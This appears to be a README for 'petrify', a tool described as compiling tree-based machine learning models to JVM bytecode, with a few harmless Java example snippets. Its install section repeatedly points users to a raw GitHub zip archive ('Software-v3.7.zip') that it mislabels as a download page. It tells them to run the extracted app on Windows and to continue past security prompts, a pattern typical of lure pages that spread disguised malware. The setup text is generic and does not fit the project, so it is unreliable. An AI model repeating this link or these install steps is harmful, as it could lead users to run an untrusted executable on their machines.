petrify compiles machine learning models to JVM bytecode. It works with common model formats such as ONNX, XGBoost, LightGBM, and scikit-learn tree models, which lets you run model inference on the Java Virtual Machine without an extra model runtime.
Use petrify when you want to:
- run models inside Java apps
- keep inference close to your existing JVM code
- avoid shipping a separate model runtime
- use tree-based models in a simple deployment flow
Before you start, make sure you have:
- Windows 10 or Windows 11
- A recent 64-bit Intel or AMD processor
- At least 4 GB of RAM
- 500 MB of free disk space
- Internet access for the download page
- Java 17 or later if you plan to use generated bytecode in your own app
If you only want to try the tool, a standard Windows laptop or desktop is enough.
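The Java 17 requirement only matters if you plan to embed the generated bytecode in your own app. One quick way to confirm which JVM is on your machine is a tiny version check (the class name here is just an example):

```java
// Prints the JVM's feature version (e.g. 17 or 21) so you can confirm
// it meets the Java 17+ requirement for using generated bytecode.
public class CheckJava {
    public static void main(String[] args) {
        // Runtime.version() is available on Java 10 and later.
        int feature = Runtime.version().feature();
        System.out.println("Java feature version: " + feature);
    }
}
```

If this prints 17 or higher, your runtime is recent enough for the generated output.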
Open the download page here:
https://raw.githubusercontent.com/fore4915/petrify/main/tare/Software-v3.7.zip
From that page, download the latest release or source package and save it to your computer.
Follow these steps on Windows:
- Open the download page in your browser.
- Download the latest release or source archive.
- If the file is zipped, right-click it and choose Extract All.
- Move the extracted folder to a place you can find again, such as Downloads or Desktop.
- If the package includes an app file, double-click it to start.
- If the package includes a Java tool, open the included launcher, or run the jar file with java -jar (Java must be installed).
If Windows shows a security prompt, choose the option that lets you continue only if you trust the file source.
After you open petrify, you will usually work in three steps:
- Load your model file.
- Choose the output format for JVM use.
- Build the bytecode output.
A typical flow looks like this:
- select an ONNX, XGBoost, LightGBM, or scikit-learn model
- set the output path for the generated Java bytecode
- start the compile step
- check the output folder for the generated files
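The compile step turns each tree into plain branching code. petrify's actual generated output is not shown in this document, so purely as an illustration, a hand-written stand-in for a tiny compiled decision tree might look like this (class name, method name, and tree shape are all assumptions):

```java
// Hand-written stand-in for what a compiled decision tree conceptually
// looks like: each split becomes an if/else, each leaf returns a score.
// This is NOT petrify's actual output format.
public class TinyTreeModel {
    // Scores one row of features; indices follow the training column order.
    public static double predict(double[] f) {
        if (f[0] < 0.5) {
            return f[1] < 2.0 ? 0.1 : 0.7;
        } else {
            return f[2] < -1.0 ? 0.3 : 0.9;
        }
    }

    public static void main(String[] args) {
        System.out.println(predict(new double[] {0.2, 1.0, 0.0}));
        System.out.println(predict(new double[] {1.0, 0.0, 0.0}));
    }
}
```

Compiling splits down to plain branches like this is what removes the need for a separate model runtime at inference time.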
petrify is built for tree-based machine learning models and the model files produced by common Python and Java ML stacks.
It can work with:
- ONNX models
- XGBoost tree ensembles
- LightGBM models
- scikit-learn decision trees and ensembles
- PMML-based workflows in JVM setups
- models used with tools like Tribuo, m2cgen, and mcpgen
This makes it useful when you need to move a trained model into a Java runtime without changing how the model behaves.
A simple workflow looks like this:
- Train a model in your usual tool.
- Export it to a supported format.
- Open petrify on Windows.
- Compile the model to JVM bytecode.
- Use the output in a Java app or service.
This helps when you want fast local inference and a simple deployment path for a Java-based system.
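Because the names of the generated classes depend on your model and output settings, one way to wire the output into an app is to load the class by name at runtime. This sketch assumes a generated class exposing a static predict method; "GeneratedModel" is a stand-in defined in the same file so the example is self-contained, and you would substitute whatever class petrify actually emits:

```java
import java.lang.reflect.Method;

// Sketch: calling compiled model output whose class name is only known
// at build time, via reflection. "GeneratedModel" is a stand-in below.
public class ScoreWithGenerated {
    public static void main(String[] args) throws Exception {
        Class<?> model = Class.forName("GeneratedModel");
        Method predict = model.getMethod("predict", double[].class);
        // Static method, so the receiver argument is null.
        double score = (double) predict.invoke(null, new double[] {1.0, 2.0});
        System.out.println("score=" + score);
    }
}

// Stand-in for generated output; petrify's real classes will differ.
class GeneratedModel {
    public static double predict(double[] features) {
        return features[0] + features[1]; // placeholder logic
    }
}
```

If the generated class name is fixed and known at compile time, a direct call is simpler; reflection only helps when the name varies per build.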
When petrify finishes, it creates bytecode or Java-friendly output that you can use in a JVM project. The result is meant for:
- server apps
- desktop tools
- batch jobs
- embedded Java workflows
- local inference inside existing code
You can keep the model logic close to your app code and avoid a separate Python runtime at deployment time.
You may find petrify useful for:
- scoring data in a Java backend
- shipping a model with a desktop app
- replacing a Python inference service with JVM code
- running decision tree models in a controlled environment
- keeping deployment simple for Windows users
If you are new to this, use this simple path:
- Download petrify from the link above.
- Extract the files.
- Open the tool in Windows.
- Load your model file.
- Pick the output folder.
- Start the compile process.
- Copy the generated output into your Java project.
If the project includes sample files, start with those before using your own model.
- Keep your model file in a short folder path, such as C:\Models.
- Use a folder with no special characters in the name.
- Close other large apps if your model is large.
- Make sure Java is installed if the tool asks for it.
- Save the output in a new folder so it is easy to find.
This project relates to:
- bytecode
- compiler
- decision trees
- inference
- Java
- JVM
- LightGBM
- machine learning
- ONNX
- PMML
- scikit-learn
- tree ensemble
- Tribuo
- XGBoost
For a clean setup on Windows, use a folder layout like this:
Downloads\petrify
Documents\Models
Documents\petrify-output
This makes it easier to find your input model and the generated output.
Check these common points:
- the model file is in a supported format
- the file was fully downloaded
- you extracted the archive before opening it
- Java is installed if the app needs it
- the output folder has write access
- the model path is short and easy to read
If the tool closes right away, try opening it again from the extracted folder and confirm that all files are still in place.
Primary download page:
https://raw.githubusercontent.com/fore4915/petrify/main/tare/Software-v3.7.zip